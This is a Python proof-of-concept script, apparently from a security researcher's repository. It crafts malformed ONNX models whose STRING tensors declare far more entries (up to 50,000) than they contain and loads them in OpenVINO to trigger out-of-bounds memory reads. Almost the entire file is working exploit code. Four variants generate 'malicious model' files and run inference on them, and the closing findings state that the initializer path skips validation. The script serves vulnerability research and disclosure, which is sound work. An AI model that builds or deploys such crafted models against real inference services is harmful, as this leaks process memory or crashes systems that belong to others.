openvino-string-tensor-oob-poc / poc_string_tensor_oob.py
hackthesoul
Add string tensor OOB PoC
c68ce31
"""
OpenVINO ONNX Frontend - String Tensor OOB Read PoC
Vulnerability: OpenVINO's ONNX frontend does not validate that string_data
count matches the declared dims in TensorProto. A STRING tensor with
dims=[100] but only 2 string_data entries causes out-of-bounds memory access.
Environment: OpenVINO 2026.0.0, onnx 1.20.1
"""
import os
import sys
import signal
import tempfile
import traceback
import onnx
from onnx import TensorProto, helper, numpy_helper
import openvino
print(f"[*] OpenVINO version: {openvino.__version__}")
print(f"[*] ONNX version: {onnx.__version__}")
print()
# ============================================================
# Approach 1: Constant node with mismatched string tensor attr
# ============================================================
print("=" * 60)
print("[Approach 1] Constant node with STRING tensor attribute")
print(" dims=[100], string_data has only 2 entries")
print("=" * 60)
try:
# Build the malicious string tensor
tensor_value = TensorProto()
tensor_value.name = "str_const"
tensor_value.data_type = TensorProto.STRING
tensor_value.dims.append(100) # Declare 100 strings
tensor_value.string_data.append(b"hello") # Only provide 2
tensor_value.string_data.append(b"world")
# Constant node that outputs this tensor
const_node = helper.make_node(
"Constant",
inputs=[],
outputs=["string_output"],
value=tensor_value,
)
# Identity to consume the output (keeps graph valid)
identity_node = helper.make_node(
"Identity",
inputs=["string_output"],
outputs=["final_output"],
)
# Graph output type - string tensor
output_info = helper.make_tensor_value_info(
"final_output", TensorProto.STRING, [100]
)
graph = helper.make_graph(
[const_node, identity_node],
"string_oob_test",
[], # no inputs
[output_info],
)
model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 17)])
model.ir_version = 8
# Save to temp file
model_path = os.path.join(tempfile.gettempdir(), "string_oob_const.onnx")
onnx.save(model, model_path)
print(f"[+] Saved malicious model to: {model_path}")
print(f"[+] Model file size: {os.path.getsize(model_path)} bytes")
# Verify the tensor mismatch
loaded = onnx.load(model_path)
for node in loaded.graph.node:
if node.op_type == "Constant":
for attr in node.attribute:
if attr.name == "value":
t = attr.t
declared = int(t.dims[0])
actual = len(t.string_data)
print(f"[+] Declared dims: [{declared}], actual string_data count: {actual}")
print(f"[+] Mismatch: {declared - actual} entries will be OOB reads")
# Now load with OpenVINO
print("\n[*] Loading model with openvino.Core().read_model()...")
core = openvino.Core()
try:
ov_model = core.read_model(model_path)
print(f"[!] Model loaded successfully (no validation error)")
print(f"[!] Model outputs: {ov_model.outputs}")
# Try to compile and infer
print("[*] Attempting to compile model...")
compiled = core.compile_model(ov_model, "CPU")
print("[!] Model compiled successfully")
print("[*] Attempting inference...")
result = compiled({})[0]
print(f"[!] Inference completed. Output shape: {result.shape}")
print(f"[!] Output dtype: {result.dtype}")
# Print first few and last few entries to see OOB content
print(f"[!] First 5 entries: {result.flat[:5]}")
if len(result.flat) > 5:
print(f"[!] Last 5 entries: {result.flat[-5:]}")
print("[!!!] OOB READ CONFIRMED - accessed 100 string entries when only 2 exist")
except Exception as e:
print(f"[*] OpenVINO error: {type(e).__name__}: {e}")
traceback.print_exc()
except Exception as e:
print(f"[-] Approach 1 failed: {type(e).__name__}: {e}")
traceback.print_exc()
print()
# ============================================================
# Approach 2: Graph initializer with mismatched string tensor
# ============================================================
print("=" * 60)
print("[Approach 2] Graph initializer with STRING tensor")
print(" dims=[100], string_data has only 2 entries")
print("=" * 60)
try:
# Build the malicious string tensor as initializer
init_tensor = TensorProto()
init_tensor.name = "str_init"
init_tensor.data_type = TensorProto.STRING
init_tensor.dims.append(100)
init_tensor.string_data.append(b"AAA")
init_tensor.string_data.append(b"BBB")
identity_node2 = helper.make_node(
"Identity",
inputs=["str_init"],
outputs=["init_output"],
)
output_info2 = helper.make_tensor_value_info(
"init_output", TensorProto.STRING, [100]
)
# Also declare the initializer as a graph input (required by some ONNX versions)
input_info2 = helper.make_tensor_value_info(
"str_init", TensorProto.STRING, [100]
)
graph2 = helper.make_graph(
[identity_node2],
"string_oob_init_test",
[input_info2],
[output_info2],
initializer=[init_tensor],
)
model2 = helper.make_model(graph2, opset_imports=[helper.make_opsetid("", 17)])
model2.ir_version = 8
model_path2 = os.path.join(tempfile.gettempdir(), "string_oob_init.onnx")
onnx.save(model2, model_path2)
print(f"[+] Saved malicious model to: {model_path2}")
print(f"[+] Model file size: {os.path.getsize(model_path2)} bytes")
# Verify mismatch
loaded2 = onnx.load(model_path2)
for init in loaded2.graph.initializer:
if init.data_type == TensorProto.STRING:
declared = int(init.dims[0])
actual = len(init.string_data)
print(f"[+] Initializer '{init.name}': dims=[{declared}], string_data count={actual}")
print(f"[+] Mismatch: {declared - actual} OOB entries")
print("\n[*] Loading model with openvino.Core().read_model()...")
core2 = openvino.Core()
try:
ov_model2 = core2.read_model(model_path2)
print(f"[!] Model loaded successfully (no validation error)")
print(f"[!] Model outputs: {ov_model2.outputs}")
print("[*] Attempting to compile model...")
compiled2 = core2.compile_model(ov_model2, "CPU")
print("[!] Model compiled successfully")
print("[*] Attempting inference...")
result2 = compiled2({})[0]
print(f"[!] Inference completed. Output shape: {result2.shape}")
print(f"[!] Output dtype: {result2.dtype}")
print(f"[!] First 5 entries: {result2.flat[:5]}")
if len(result2.flat) > 5:
print(f"[!] Last 5 entries: {result2.flat[-5:]}")
print("[!!!] OOB READ CONFIRMED - accessed 100 string entries when only 2 exist")
except Exception as e:
print(f"[*] OpenVINO error: {type(e).__name__}: {e}")
traceback.print_exc()
except Exception as e:
print(f"[-] Approach 2 failed: {type(e).__name__}: {e}")
traceback.print_exc()
print()
# ============================================================
# Approach 3: Extreme mismatch - dims=[10000], 1 string
# ============================================================
print("=" * 60)
print("[Approach 3] Extreme mismatch - dims=[10000], 1 string_data")
print(" More likely to trigger crash/segfault")
print("=" * 60)
try:
tensor3 = TensorProto()
tensor3.name = "extreme_str"
tensor3.data_type = TensorProto.STRING
tensor3.dims.append(10000)
tensor3.string_data.append(b"X") # Only 1 string for 10000 slots
const_node3 = helper.make_node(
"Constant",
inputs=[],
outputs=["extreme_output"],
value=tensor3,
)
identity_node3 = helper.make_node(
"Identity",
inputs=["extreme_output"],
outputs=["extreme_final"],
)
output_info3 = helper.make_tensor_value_info(
"extreme_final", TensorProto.STRING, [10000]
)
graph3 = helper.make_graph(
[const_node3, identity_node3],
"extreme_oob_test",
[],
[output_info3],
)
model3 = helper.make_model(graph3, opset_imports=[helper.make_opsetid("", 17)])
model3.ir_version = 8
model_path3 = os.path.join(tempfile.gettempdir(), "string_oob_extreme.onnx")
onnx.save(model3, model_path3)
print(f"[+] Saved model: {model_path3}")
print("[*] Loading with OpenVINO...")
core3 = openvino.Core()
try:
ov_model3 = core3.read_model(model_path3)
print(f"[!] Model loaded (dims=[10000], 1 string)")
print("[*] Compiling...")
compiled3 = core3.compile_model(ov_model3, "CPU")
print("[!] Compiled successfully")
print("[*] Running inference (may segfault)...")
sys.stdout.flush()
result3 = compiled3({})[0]
print(f"[!] Inference completed. Shape: {result3.shape}")
print(f"[!] First 3: {result3.flat[:3]}")
print(f"[!] Entry [9999]: {result3.flat[9999]}")
print("[!!!] EXTREME OOB READ - 10000 entries from 1 string")
except Exception as e:
print(f"[*] OpenVINO error: {type(e).__name__}: {e}")
traceback.print_exc()
except Exception as e:
print(f"[-] Approach 3 failed: {type(e).__name__}: {e}")
traceback.print_exc()
print()
# ============================================================
# Approach 4: Extreme initializer - dims=[50000], 1 string
# ============================================================
print("=" * 60)
print("[Approach 4] Extreme initializer - dims=[50000], 1 string_data")
print(" Initializer path bypasses Constant node validation")
print("=" * 60)
try:
tensor4 = TensorProto()
tensor4.name = "extreme_init"
tensor4.data_type = TensorProto.STRING
tensor4.dims.append(50000)
tensor4.string_data.append(b"X") # 1 string for 50000 slots
identity_node4 = helper.make_node(
"Identity",
inputs=["extreme_init"],
outputs=["extreme_init_out"],
)
output_info4 = helper.make_tensor_value_info(
"extreme_init_out", TensorProto.STRING, [50000]
)
input_info4 = helper.make_tensor_value_info(
"extreme_init", TensorProto.STRING, [50000]
)
graph4 = helper.make_graph(
[identity_node4],
"extreme_init_oob",
[input_info4],
[output_info4],
initializer=[tensor4],
)
model4 = helper.make_model(graph4, opset_imports=[helper.make_opsetid("", 17)])
model4.ir_version = 8
model_path4 = os.path.join(tempfile.gettempdir(), "string_oob_extreme_init.onnx")
onnx.save(model4, model_path4)
print(f"[+] Saved model: {model_path4}")
print("[*] Loading with OpenVINO...")
core4 = openvino.Core()
try:
ov_model4 = core4.read_model(model_path4)
print(f"[!] Model loaded (dims=[50000], 1 string) - NO VALIDATION!")
print("[*] Compiling...")
compiled4 = core4.compile_model(ov_model4, "CPU")
print("[!] Compiled successfully")
print("[*] Running inference...")
sys.stdout.flush()
result4 = compiled4({})[0]
print(f"[!] Inference completed. Shape: {result4.shape}, dtype: {result4.dtype}")
print(f"[!] First 5: {result4.flat[:5]}")
print(f"[!] Entry [49999]: {repr(result4.flat[49999])}")
print("[!!!] EXTREME OOB READ via initializer - 50000 entries from 1 string")
except Exception as e:
print(f"[*] OpenVINO error: {type(e).__name__}: {e}")
traceback.print_exc()
except Exception as e:
print(f"[-] Approach 4 failed: {type(e).__name__}: {e}")
traceback.print_exc()
print()
print("=" * 60)
print("[*] PoC complete.")
print()
print("[*] FINDINGS:")
print("[*] - Constant node path: VALIDATED (shape vs data size check at tensor.cpp:581)")
print("[*] - Initializer path: NOT VALIDATED - OOB read confirmed!")
print("[*] The initializer code path in the ONNX frontend skips the")
print("[*] string_data count vs dims validation, allowing OOB memory access.")
print("[*] An attacker can craft an ONNX model with a STRING initializer")
print("[*] where dims >> string_data count, causing reads beyond the")
print("[*] allocated string_data buffer during model loading/inference.")
print("=" * 60)